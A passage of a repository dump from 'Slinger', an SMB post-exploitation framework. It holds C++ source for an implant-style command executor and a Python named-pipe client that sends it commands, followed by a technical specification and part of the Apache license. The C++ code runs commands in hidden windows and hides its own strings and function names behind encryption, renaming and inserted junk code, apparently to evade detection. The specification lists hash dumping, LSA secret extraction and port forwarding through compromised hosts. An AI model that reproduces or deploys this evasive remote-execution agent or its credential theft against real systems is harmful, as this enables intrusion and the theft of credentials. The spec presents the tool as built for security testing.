sa.bInheritHandle = TRUE; 101 | 102 | HANDLE hRead, hWrite; 103 | if (!CreatePipe(&hRead, &hWrite, &sa, 0)) { 104 | return ERROR_PREFIX.decrypt() + "Failed to create pipe"; 105 | } 106 | 107 | STARTUPINFOA si; 108 | PROCESS_INFORMATION pi; 109 | ZeroMemory(&si, sizeof(si)); 110 | ZeroMemory(&pi, sizeof(pi)); 111 | si.cb = sizeof(si); 112 | si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 113 | si.hStdOutput = hWrite; 114 | si.hStdError = hWrite; 115 | si.wShowWindow = SW_HIDE; 116 | 117 | obf::StackString<512> command_line(cmd_line.c_str()); 118 | 119 | BOOL success = CreateProcessA( 120 | NULL, 121 | const_cast(command_line.c_str()), 122 | NULL, NULL, TRUE, CREATE_NO_WINDOW, 123 | NULL, NULL, &si, &pi 124 | ); 125 | 126 | CloseHandle(hWrite); 127 | 128 | if (!success) { 129 | CloseHandle(hRead); 130 | return ERROR_PREFIX.decrypt() + "Failed to execute command"; 131 | } 132 | 133 | // Read output 134 | std::string output; 135 | char buffer[4096]; 136 | DWORD bytes_read; 137 | 138 | while (ReadFile(hRead, buffer, sizeof(buffer) - 1, 
&bytes_read, NULL) && bytes_read > 0) { 139 | buffer[bytes_read] = '\0'; 140 | output += buffer; 141 | obf::insert_junk_code(); 142 | } 143 | 144 | WaitForSingleObject(pi.hProcess, 30000); // 30 second timeout 145 | CloseHandle(hRead); 146 | CloseHandle(pi.hProcess); 147 | CloseHandle(pi.hThread); 148 | 149 | return output.empty() ? INFO_PREFIX.decrypt() + "Command executed successfully" : output; 150 | #else 151 | // Linux implementation using popen 152 | FILE* pipe = popen(cmd_line.c_str(), "r"); 153 | if (!pipe) { 154 | return ERROR_PREFIX.decrypt() + "Failed to execute command"; 155 | } 156 | 157 | std::string output; 158 | char buffer[4096]; 159 | while (fgets(buffer, sizeof(buffer), pipe) != nullptr) { 160 | output += buffer; 161 | obf::insert_junk_code(); 162 | } 163 | 164 | int exit_code = pclose(pipe); 165 | if (output.empty() && exit_code == 0) { 166 | return INFO_PREFIX.decrypt() + "Command executed successfully"; 167 | } 168 | 169 | return output; 170 | #endif 171 | } 172 | 173 | std::string CommandExecutor::OBF_FUNC_NAME(execute_cmd)(const std::string& command) { 174 | auto cmd_exe = CMD_EXE.decrypt(); 175 | auto cmd_flag = CMD_FLAG.decrypt(); 176 | auto sanitized = OBF_FUNC_NAME(sanitize_command)(command); 177 | 178 | std::string full_command = cmd_exe + " " + cmd_flag + " " + sanitized; 179 | return OBF_FUNC_NAME(execute_with_createprocess)(full_command); 180 | } 181 | 182 | std::string CommandExecutor::OBF_FUNC_NAME(execute_powershell)(const std::string& command) { 183 | auto ps_exe = POWERSHELL_EXE.decrypt(); 184 | auto ps_flags = PS_FLAGS.decrypt(); 185 | auto sanitized = OBF_FUNC_NAME(sanitize_command)(command); 186 | 187 | std::string full_command = ps_exe + " " + ps_flags + " \"" + sanitized + "\""; 188 | return OBF_FUNC_NAME(execute_with_createprocess)(full_command); 189 | } 190 | 191 | std::string CommandExecutor::execute(const std::string& command) { 192 | if (command.empty()) { 193 | return ERROR_PREFIX.decrypt() + "Empty command"; 194 | } 195 | 196 | obf::insert_junk_code(); 197 | 198 | // Check for pwd command (with or without && suffix) 199 | if (command == "pwd" || command.substr(0, 4) == "pwd " || command.substr(0, 7) == "pwd && ") { 200 | return get_current_directory(); 201 | } 202 | 203 | // Check for cd command (bare cd or cd with path) 204 | if (command == "cd" || command == "cd && cd") { 205 | return get_current_directory(); 206 | } 207 | 208 | if (command.substr(0, 3) == "cd ") { 209 | std::string path = command.substr(3); 210 | // Extract path up to && if present (client appends "&& cd" for tracking) 211 | size_t and_pos = path.find("&&"); 212 | if (and_pos != std::string::npos) { 213 | path = path.substr(0, and_pos); 214 | // Trim trailing whitespace 215 | while (!path.empty() && (path.back() == ' ' || path.back() == '\t')) { 216 | path.pop_back(); 217 | } 218 | } 219 | if (change_directory(path)) { 220 | return get_current_directory(); 221 | } else { 222 | return ERROR_PREFIX.decrypt() + "Failed to change directory"; 223 | } 224 | } 225 | 226 | //if (command == "ps" || command == "tasklist") { 227 | // return list_processes(); 228 | //} 229 | 230 | //if (command == "sysinfo" || command == "systeminfo") { 231 | // return get_system_info(); 232 | //} 233 | 234 | // Execute based on command type 235 | if (OBF_FUNC_NAME(is_powershell_command)(command)) { 236 | return OBF_FUNC_NAME(execute_powershell)(command); 237 | } else { 238 | return OBF_FUNC_NAME(execute_cmd)(command); 239 | } 240 | } 241 | 242 | std::string CommandExecutor::get_current_directory() { 
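    // Cross-platform cwd lookup: GetCurrentDirectoryA on Windows, getcwd() elsewhere (MAX_PATH is aliased to PATH_MAX in the POSIX branch above).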
243 | char buffer[MAX_PATH]; 244 | 245 | #ifdef _WIN32 246 | DWORD result = GetCurrentDirectoryA(MAX_PATH, buffer); 247 | if (result == 0) { 248 | return ERROR_PREFIX.decrypt() + "Failed to get current directory"; 249 | } 250 | #else 251 | if (getcwd(buffer, MAX_PATH) == nullptr) { 252 | return ERROR_PREFIX.decrypt() + "Failed to get current directory"; 253 | } 254 | #endif 255 | 256 | return INFO_PREFIX.decrypt() + "Current directory: " + std::string(buffer); 257 | } 258 | 259 | bool CommandExecutor::change_directory(const std::string& path) { 260 | obf::insert_junk_code(); 261 | #ifdef _WIN32 262 | return SetCurrentDirectoryA(path.c_str()) != 0; 263 | #else 264 | return chdir(path.c_str()) == 0; 265 | #endif 266 | } 267 | 268 | std::string CommandExecutor::list_processes() { 269 | #ifdef _WIN32 270 | return OBF_FUNC_NAME(execute_cmd)("tasklist /fo csv"); 271 | #else 272 | return OBF_FUNC_NAME(execute_cmd)("ps aux"); 273 | #endif 274 | } 275 | 276 | std::string CommandExecutor::get_system_info() { 277 | std::stringstream info; 278 | 279 | #ifdef _WIN32 280 | // Get computer name 281 | char computer_name[MAX_COMPUTERNAME_LENGTH + 1]; 282 | DWORD size = sizeof(computer_name); 283 | if (GetComputerNameA(computer_name, &size)) { 284 | info << INFO_PREFIX.decrypt() << "Computer: " << computer_name << "\n"; 285 | } 286 | 287 | // Get username 288 | char username[256]; 289 | size = sizeof(username); 290 | if (GetUserNameA(username, &size)) { 291 | info << INFO_PREFIX.decrypt() << "User: " << username << "\n"; 292 | } 293 | 294 | // Get OS version 295 | OSVERSIONINFOA os_info; 296 | os_info.dwOSVersionInfoSize = sizeof(os_info); 297 | if (GetVersionExA(&os_info)) { 298 | info << INFO_PREFIX.decrypt() << "OS Version: " 299 | << os_info.dwMajorVersion << "." 300 | << os_info.dwMinorVersion << "." 
301 | << os_info.dwBuildNumber << "\n"; 302 | } 303 | #else 304 | // Linux system info 305 | char hostname[256]; 306 | if (gethostname(hostname, sizeof(hostname)) == 0) { 307 | info << INFO_PREFIX.decrypt() << "Hostname: " << hostname << "\n"; 308 | } 309 | 310 | char* username = getenv("USER"); 311 | if (username) { 312 | info << INFO_PREFIX.decrypt() << "User: " << username << "\n"; 313 | } 314 | 315 | // Get OS info from uname 316 | info << OBF_FUNC_NAME(execute_cmd)("uname -a") << "\n"; 317 | #endif 318 | 319 | // Get current directory 320 | info << get_current_directory() << "\n"; 321 | 322 | return info.str(); 323 | } 324 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/named_pipe_client.py: -------------------------------------------------------------------------------- 1 | """ 2 | Named Pipe Client Implementation for Agent Communication 3 | Supports both pywin32 and ctypes for cross-platform compatibility 4 | """ 5 | 6 | import struct 7 | import time 8 | from abc import ABC, abstractmethod 9 | 10 | 11 | class NamedPipeClientBase(ABC): 12 | """Base class for named pipe clients""" 13 | 14 | def __init__(self, pipe_path, timeout): 15 | self.pipe_path = pipe_path 16 | self.timeout = timeout 17 | self.connected = False 18 | 19 | @abstractmethod 20 | def connect(self): 21 | """Connect to the named pipe""" 22 | pass 23 | 24 | @abstractmethod 25 | def disconnect(self): 26 | """Disconnect from the named pipe""" 27 | pass 28 | 29 | @abstractmethod 30 | def send_raw(self, data): 31 | """Send raw bytes to the pipe""" 32 | pass 33 | 34 | @abstractmethod 35 | def receive_raw(self, size): 36 | """Receive raw bytes from the pipe""" 37 | pass 38 | 39 | def send_message(self, message_type, data): 40 | """Send a structured message to the agent""" 41 | try: 42 | # Message format: [length:4][type:4][data:N] 43 | data_bytes = data.encode("utf-8") if isinstance(data, str) else data 44 | length = len(data_bytes) 45 | 46 | header = struct.pack(" 0: 67 | data = self.receive_raw(length) 68 | if not data or len(data) != length: 69 | return None, None 70 | return msg_type, data.decode("utf-8", errors="ignore") 71 | else: 72 | return msg_type, "" 73 | 74 | except Exception as e: 75 | print(f"Failed to receive message: {e}") 76 | return None, None 77 | 78 | def send_handshake(self): 79 | """Send handshake to agent""" 80 | return self.send_message(0x1003, "SLINGER_READY") # HANDSHAKE type 81 | 82 | def send_command(self, command): 83 | """Send command to agent""" 84 | return self.send_message(0x1001, command) # COMMAND type 85 | 86 | def receive_response(self): 87 | """Receive response from agent""" 88 | msg_type, data = self.receive_message() 89 | if msg_type == 0x1002: # RESPONSE type 90 | return data 91 | return None 92 | 93 | 94 | class NamedPipeClientWin32(NamedPipeClientBase): 95 | """Named pipe client using pywin32""" 96 | 97 | def __init__(self, pipe_path, timeout): 98 | super().__init__(pipe_path, timeout) 99 | self.handle = None 100 | 101 | def connect(self): 102 | """Connect using pywin32""" 103 | try: 104 | import win32pipe 105 | import win32file 106 | import pywintypes 107 | 108 | # Wait for pipe to be available 109 | start_time = time.time() 110 | while time.time() - start_time < self.timeout: 111 | try: 112 | win32pipe.WaitNamedPipe(self.pipe_path, int(self.timeout * 1000)) 113 | break 114 | except pywintypes.error: 115 | time.sleep(0.1) 116 | continue 117 | else: 118 | return False 119 | 120 | # Open the pipe 121 | self.handle = 
win32file.CreateFile( 122 | self.pipe_path, 123 | win32file.GENERIC_READ | win32file.GENERIC_WRITE, 124 | 0, 125 | None, 126 | win32file.OPEN_EXISTING, 127 | 0, 128 | None, 129 | ) 130 | 131 | if self.handle == win32file.INVALID_HANDLE_VALUE: 132 | return False 133 | 134 | self.connected = True 135 | return True 136 | 137 | except Exception as e: 138 | print(f"Win32 pipe connection failed: {e}") 139 | return False 140 | 141 | def disconnect(self): 142 | """Disconnect using pywin32""" 143 | try: 144 | if self.handle: 145 | import win32file 146 | 147 | win32file.CloseHandle(self.handle) 148 | self.handle = None 149 | self.connected = False 150 | except: 151 | pass 152 | 153 | def send_raw(self, data): 154 | """Send raw data using pywin32""" 155 | try: 156 | if not self.connected or not self.handle: 157 | return False 158 | 159 | import win32file 160 | 161 | bytes_written = 0 162 | total_bytes = len(data) 163 | 164 | while bytes_written < total_bytes: 165 | result, written = win32file.WriteFile(self.handle, data[bytes_written:]) 166 | if result != 0: 167 | return False 168 | bytes_written += written 169 | 170 | return True 171 | 172 | except Exception as e: 173 | print(f"Win32 send failed: {e}") 174 | return False 175 | 176 | def receive_raw(self, size): 177 | """Receive raw data using pywin32""" 178 | try: 179 | if not self.connected or not self.handle: 180 | return None 181 | 182 | import win32file 183 | 184 | result, data = win32file.ReadFile(self.handle, size) 185 | if result == 0: 186 | return data 187 | return None 188 | 189 | except Exception as e: 190 | print(f"Win32 receive failed: {e}") 191 | return None 192 | 193 | 194 | class NamedPipeClientCtypes(NamedPipeClientBase): 195 | """Named pipe client using ctypes (cross-platform)""" 196 | 197 | def __init__(self, pipe_path, timeout): 198 | super().__init__(pipe_path, timeout) 199 | self.handle = None 200 | self._setup_ctypes() 201 | 202 | def _setup_ctypes(self): 203 | """Setup ctypes for Windows API calls""" 204 | try: 205 | import ctypes 206 | from ctypes import wintypes 207 | 208 | self.kernel32 = ctypes.windll.kernel32 209 | 210 | # Define Windows constants 211 | self.GENERIC_READ = 0x80000000 212 | self.GENERIC_WRITE = 0x40000000 213 | self.OPEN_EXISTING = 3 214 | self.INVALID_HANDLE_VALUE = -1 215 | 216 | # Setup function prototypes 217 | self.kernel32.CreateFileW.argtypes = [ 218 | wintypes.LPCWSTR, 219 | wintypes.DWORD, 220 | wintypes.DWORD, 221 | ctypes.c_void_p, 222 | wintypes.DWORD, 223 | wintypes.DWORD, 224 | wintypes.HANDLE, 225 | ] 226 | self.kernel32.CreateFileW.restype = wintypes.HANDLE 227 | 228 | self.kernel32.WriteFile.argtypes = [ 229 | wintypes.HANDLE, 230 | ctypes.c_void_p, 231 | wintypes.DWORD, 232 | ctypes.POINTER(wintypes.DWORD), 233 | ctypes.c_void_p, 234 | ] 235 | self.kernel32.WriteFile.restype = wintypes.BOOL 236 | 237 | self.kernel32.ReadFile.argtypes = [ 238 | wintypes.HANDLE, 239 | ctypes.c_void_p, 240 | wintypes.DWORD, 241 | ctypes.POINTER(wintypes.DWORD), 242 | ctypes.c_void_p, 243 | ] 244 | self.kernel32.ReadFile.restype = wintypes.BOOL 245 | 246 | except Exception as e: 247 | print(f"Failed to setup ctypes: {e}") 248 | raise 249 | 250 | def connect(self): 251 | """Connect using ctypes""" 252 | try: 253 | import ctypes 254 | 255 | # Try to open the pipe 256 | start_time = time.time() 257 | while time.time() - start_time < self.timeout: 258 | self.handle = self.kernel32.CreateFileW( 259 | self.pipe_path, 260 | self.GENERIC_READ | self.GENERIC_WRITE, 261 | 0, 262 | None, 263 | self.OPEN_EXISTING, 264 | 
0, 265 | None, 266 | ) 267 | 268 | if self.handle != self.INVALID_HANDLE_VALUE: 269 | self.connected = True 270 | return True 271 | 272 | time.sleep(0.1) 273 | 274 | return False 275 | 276 | except Exception as e: 277 | print(f"Ctypes pipe connection failed: {e}") 278 | return False 279 | 280 | def disconnect(self): 281 | """Disconnect using ctypes""" 282 | try: 283 | if self.handle and self.handle != self.INVALID_HANDLE_VALUE: 284 | self.kernel32.CloseHandle(self.handle) 285 | self.handle = None 286 | self.connected = False 287 | except: 288 | pass 289 | 290 | def send_raw(self, data): 291 | """Send raw data using ctypes""" 292 | try: 293 | if not self.connected or not self.handle: 294 | return False 295 | 296 | import ctypes 297 | from ctypes import wintypes 298 | 299 | bytes_written = wintypes.DWORD(0) 300 | result = self.kernel32.WriteFile( 301 | self.handle, ctypes.c_char_p(data), len(data), ctypes.byref(bytes_written), None 302 | ) 303 | 304 | return result and bytes_written.value == len(data) 305 | 306 | except Exception as e: 307 | print(f"Ctypes send failed: {e}") 308 | return False 309 | 310 | def receive_raw(self, size): 311 | """Receive raw data using ctypes""" 312 | try: 313 | if not self.connected or not self.handle: 314 | return None 315 | 316 | import ctypes 317 | from ctypes import wintypes 318 | 319 | buffer = ctypes.create_string_buffer(size) 320 | bytes_read = wintypes.DWORD(0) 321 | 322 | result = self.kernel32.ReadFile( 323 | self.handle, buffer, size, ctypes.byref(bytes_read), None 324 | ) 325 | 326 | if result: 327 | return buffer.raw[: bytes_read.value] 328 | return None 329 | 330 | except Exception as e: 331 | print(f"Ctypes receive failed: {e}") 332 | return None 333 | -------------------------------------------------------------------------------- /docs/TECHNICAL_SPEC.md: -------------------------------------------------------------------------------- 1 | # Technical Specification 2 | 3 | ## Project Overview 4 | 5 | Slinger is a comprehensive SMB (Server Message Block) client framework designed for security professionals and system administrators. Built on the Impacket library, it provides an interactive command-line interface for advanced Windows system administration and security testing operations over SMB/CIFS protocols. 6 | 7 | ### Core Architecture 8 | 9 | The project follows a modular, plugin-based architecture with these key components: 10 | 11 | 1. **Interactive CLI Layer** (`slinger.py`): Main entry point providing persistent interactive session with command history, auto-completion, and context awareness 12 | 2. **SMB Protocol Layer** (`smblib.py`): Core SMB operations including file transfers, directory navigation, and share management 13 | 3. **Windows Administration Layer** (`slingerclient.py`): High-level wrappers for Windows-specific operations (services, tasks, registry, processes) 14 | 4. **Plugin System**: Extensible architecture allowing custom functionality modules 15 | 5. **Utility Framework** (`utils/`): Supporting modules for CLI parsing, output formatting, configuration management, and logging 16 | 17 | ### Operational Flow 18 | 19 | 1. **Connection Establishment**: Authenticates to target Windows system using NTLM, Kerberos, or password-based authentication 20 | 2. **Share Enumeration**: Discovers and connects to available SMB shares (C$, Admin$, custom shares) 21 | 3. **Interactive Operations**: Provides shell-like interface for file operations, system administration, and reconnaissance 22 | 4. 
**Context Management**: Maintains current working directory, connection state, and session history 23 | 5. **Plugin Integration**: Dynamically loads additional functionality modules for specialized operations 24 | 25 | ### Key Capabilities 26 | 27 | **File System Operations:** 28 | - Bi-directional file transfers with resume capability 29 | - Recursive directory operations with depth control 30 | - Advanced path resolution and normalization 31 | - Output redirection and command result archiving 32 | 33 | **Windows System Administration:** 34 | - Service management (start/stop/create/delete/enumerate) 35 | - Scheduled task management with XML template support 36 | - Registry operations (read/write/delete keys and values) 37 | - Process enumeration and management 38 | - Network configuration and interface discovery 39 | 40 | **Security Operations:** 41 | - Hash dumping (SAM, SYSTEM, SECURITY hives) 42 | - Secrets extraction (LSA secrets, cached credentials) 43 | - User session enumeration 44 | - Firewall rule analysis 45 | - Remote command execution via task scheduling 46 | 47 | **Advanced Features:** 48 | - Port forwarding through compromised systems 49 | - Performance counter monitoring 50 | - Event log access and analysis 51 | - WMI query capabilities 52 | - Plugin-based extensibility 53 | 54 | ## Core Functions and Classes 55 | 56 | ### Main Entry Point (slinger.py) 57 | 58 | #### `main()` 59 | - **Purpose**: Main application entry point 60 | - **Parameters**: None (uses sys.argv) 61 | - **Returns**: None 62 | - **Description**: Handles argument parsing, authentication, SMB connection establishment, and main command loop 63 | 64 | #### `create_ntlm_hash(password)` 65 | - **Purpose**: Generate NTLM hash from plaintext password 66 | - **Parameters**: 67 | - `password` (str): Plaintext password 68 | - **Returns**: str - NTLM hash or None on failure 69 | - **Description**: Uses passlib to create NTLM hash for authentication 70 | 71 | ### SMB Library (smblib.py) 72 | 73 | #### File Operations 74 | 75 | ##### `upload_handler(args)` 76 | - **Purpose**: Handle file upload command with path validation 77 | - **Parameters**: 78 | - `args`: Parsed arguments containing local_path and remote_path 79 | - **Returns**: None 80 | - **Description**: Validates paths, shows verbose output, calls upload() 81 | 82 | ##### `upload(local_path, remote_path)` 83 | - **Purpose**: Core file upload functionality 84 | - **Parameters**: 85 | - `local_path` (str): Local file path to upload 86 | - `remote_path` (str): Remote destination path 87 | - **Returns**: None 88 | - **Description**: Performs actual SMB file upload using conn.putFile() 89 | 90 | ##### `download_handler(args, echo=True)` 91 | - **Purpose**: Handle file download command with path validation 92 | - **Parameters**: 93 | - `args`: Parsed arguments containing remote_path and local_path 94 | - `echo` (bool): Whether to show progress messages 95 | - **Returns**: None 96 | - **Description**: Validates paths, determines local filename (supports custom filenames), calls download() 97 | - **Enhancement**: Now supports custom filenames via syntax: `get remote_file.txt /path/to/custom_name.txt` 98 | 99 | ##### `download(remote_path, local_path, echo=True)` 100 | - **Purpose**: Core file download functionality 101 | - **Parameters**: 102 | - `remote_path` (str): Remote file path to download 103 | - `local_path` (str): Local destination path 104 | - `echo` (bool): Whether to show progress messages 105 | - **Returns**: None 106 | - **Description**: Performs actual 
SMB file download using conn.getFile() 107 | 108 | #### Directory Operations 109 | 110 | ##### `ls(args=None)` 111 | - **Purpose**: List directory contents with various options 112 | - **Parameters**: 113 | - `args`: Parsed arguments with path, sort, recursive, output options 114 | - **Returns**: None 115 | - **Description**: Lists files/directories, supports recursive listing, output to file 116 | 117 | ##### `cd(path)` 118 | - **Purpose**: Change current directory 119 | - **Parameters**: 120 | - `path` (str): Target directory path 121 | - **Returns**: None 122 | - **Description**: Validates and changes current working directory 123 | 124 | ##### `connect_share(args)` 125 | - **Purpose**: Connect to a specific SMB share 126 | - **Parameters**: 127 | - `args`: Parsed arguments containing share name 128 | - **Returns**: None 129 | - **Description**: Establishes connection to specified share 130 | 131 | ##### `find_handler(args)` 132 | - **Purpose**: Handle file search command with pattern matching and filtering 133 | - **Parameters**: 134 | - `args`: Parsed arguments containing pattern, type, size, depth, timeout, and progress options 135 | - **Returns**: None 136 | - **Description**: Searches for files/directories matching specified criteria 137 | - **Features**: 138 | - Pattern matching with wildcards and regex support 139 | - File type filtering (-type f/d) 140 | - Size filtering with operators (+100MB, -1KB, =500B) 141 | - Depth control (--maxdepth, --mindepth) 142 | - Configurable timeout protection (-timeout with 120s default) 143 | - Verbose progress reporting (-progress) 144 | - Result limiting (--limit) 145 | - Multiple output formats (table, json, list, paths) 146 | 147 | ##### `_find_files(pattern, search_path, timeout=120, ...)` 148 | - **Purpose**: Core file search implementation with recursive directory traversal 149 | - **Parameters**: 150 | - `pattern` (str): Search pattern (wildcard or regex) 151 | - `search_path` (str): Starting directory for search 152 | - `timeout` (int): Search timeout in seconds (configurable via CLI) 153 | - Various filtering options (file_type, size_filter, depth limits, etc.) 
154 | - **Returns**: List of dictionaries containing file information 155 | - **Description**: Performs recursive file system traversal with timeout protection 156 | - **Enhancements**: 157 | - Configurable timeout via `-timeout` flag (default: 120 seconds) 158 | - Single timeout warning message to prevent duplicates 159 | - Verbose progress output showing directory-by-directory traversal 160 | - Timeout protection with shared warning flag across recursive calls 161 | 162 | #### Path Validation 163 | 164 | ##### `_validate_path_security(current_path, target_path)` 165 | - **Purpose**: Validate and normalize paths for security 166 | - **Parameters**: 167 | - `current_path` (str): Current working directory 168 | - `target_path` (str): User-provided target path 169 | - **Returns**: tuple (bool, str, str) - (is_valid, resolved_path, warning_message) 170 | - **Description**: Prevents directory traversal attacks, normalizes paths 171 | 172 | ##### `_resolve_remote_path(user_path, default_name=None)` 173 | - **Purpose**: Resolve user-provided paths for remote operations 174 | - **Parameters**: 175 | - `user_path` (str): User-provided path 176 | - `default_name` (str): Default filename if path is empty 177 | - **Returns**: tuple (bool, str, str) - (success, resolved_path, error_message) 178 | - **Description**: Handles relative/absolute paths securely 179 | - **Enhancement**: Fixed relative path handling for "../" in upload operations 180 | 181 | ### CLI System (cli.py) 182 | 183 | #### `setup_cli_parser(slingerClient)` 184 | - **Purpose**: Configure argparse-based command system 185 | - **Parameters**: 186 | - `slingerClient`: SMB client instance for command routing 187 | - **Returns**: ArgumentParser - Configured parser with all commands 188 | - **Description**: Sets up all available commands with their arguments and handlers 189 | 190 | #### `print_all_commands(parser)` 191 | - **Purpose**: Display available commands in formatted columns 192 | - **Parameters**: 193 | - `parser`: ArgumentParser instance 194 | - **Returns**: None 195 | - **Description**: Shows user all available commands in 4-column format 196 | 197 | #### `force_help(parser, command)` 198 | - **Purpose**: Show help for specific command 199 | - **Parameters**: 200 | - `parser`: ArgumentParser instance 201 | - `command` (str): Command name to show help for 202 | - **Returns**: None 203 | - **Description**: Displays detailed help for individual commands 204 | 205 | ### Utility Functions (printlib.py) 206 | 207 | #### `print_verbose(msg)` 208 | - **Purpose**: Display verbose messages when verbose mode is enabled 209 | - **Parameters**: 210 | - `msg` (str): Message to display 211 | - **Returns**: None 212 | - **Description**: Checks verbose config setting and prints with [*] prefix 213 | 214 | #### `print_good(msg)`, `print_bad(msg)`, `print_warning(msg)`, `print_info(msg)` 215 | - **Purpose**: Colored output functions for different message types 216 | - **Parameters**: 217 | - `msg` (str): Message to display 218 | - **Returns**: None 219 | - **Description**: Provides consistent colored output with appropriate prefixes 220 | 221 | ### Configuration System (config.py) 222 | 223 | #### Configuration Variables 224 | - **Debug**: Enable debug messages (bool) 225 | - **Verbose**: Enable verbose output (bool) 226 | - **Logs_Folder**: Directory for log files (str) 227 | - **History_File**: Command history file location (str) 228 | - **Plugin_Folders**: Directories to search for plugins (list) 229 | - **Codec**: Text encoding for output 
(str) 230 | 231 | ### Output Redirection (common.py) 232 | 233 | #### `tee_output(filename)` 234 | - **Purpose**: Context manager for redirecting output to file and console 235 | - **Parameters**: 236 | - `filename` (str): Output file path 237 | - **Returns**: Context manager 238 | - **Description**: Allows saving command output to file while still showing on console 239 | 240 | #### `TeeOutput` class 241 | - **Purpose**: Output redirection implementation 242 | - **Methods**: 243 | - `write(data)`: Write to both console and file 244 | - `flush()`: Flush both outputs 245 | - `close()`: Close file handle 246 | - **Description**: Core implementation for output redirection functionality 247 | 248 | ## Plugin Architecture 249 | 250 | ### Plugin Loading 251 | - Plugins are loaded from configured directories 252 | - Each plugin must inherit from base plugin class 253 | - Plugins can add new commands to the CLI system 254 | - Plugin parsers are merged with main argument parser 255 | 256 | ### Plugin Integration 257 | - Plugins register their own command handlers 258 | - Commands are dynamically added to the main CLI 259 | - Plugin state is maintained throughout session 260 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. 
For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for 